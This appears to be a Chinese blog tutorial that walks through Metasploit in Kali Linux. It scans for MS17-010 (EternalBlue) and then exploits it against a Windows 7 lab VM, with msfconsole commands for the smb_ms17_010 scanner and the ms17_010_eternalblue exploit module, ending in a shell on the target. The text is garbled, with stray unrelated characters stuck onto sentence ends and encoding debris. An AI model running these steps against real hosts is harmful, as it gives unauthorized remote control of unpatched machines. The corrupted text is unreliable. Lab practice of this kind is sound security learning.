????Metasploit是一個免費的、可下載的框架霍弹,通過它可以很容易地獲取、開發(fā)并對計算機軟件漏洞實施攻擊(也通常用于回溯分析)组贺。
????此次采用kali Linux系統(tǒng)集成的metasploit進行測試驗證MS17-010(永恒之藍丸边,著名比特幣勒索漏洞)叠必。實驗環(huán)境采用虛擬機,kali 測試機妹窖,windows 7 x64 測試靶機纬朝。
一、使用scanner下掃描模塊掃描是否存在漏洞骄呼。
①啟用msf之前需要啟用postgres服務
②msfconsole //啟用msf
③search smb_ms17_010? //使用search 查找ms17_010利用工具目錄
④use auxiliary/scanner/smb/smb_ms17_010? //調用scanner smb_ms17_010模塊進行掃描
并使用show options查看設置參數
⑥set RHOSTS 192.168.198.136? //設置掃描地址(可設置掃描段 eg: set RHOSTS 192.168.198.0/24)
設置好之后共苛,使用show options查看配置信息,并使用exploit進行測試(利用測試蜓萄,顯示綠色的+隅茎,以及提示信息,即為存在漏洞主機)绕德。
二、使用exploit下利用模塊進行漏洞攻擊摊阀。
①use exploit/windows/smb/ms17_010_eternalblue? //調用exploit下的ms17_010_eternalblue模塊
使用show options查看參數設置
③set RHOST 192.168.198.136???//設置目標靶機
并使用exploit調用漏洞測試耻蛇,成功拿到目標shell
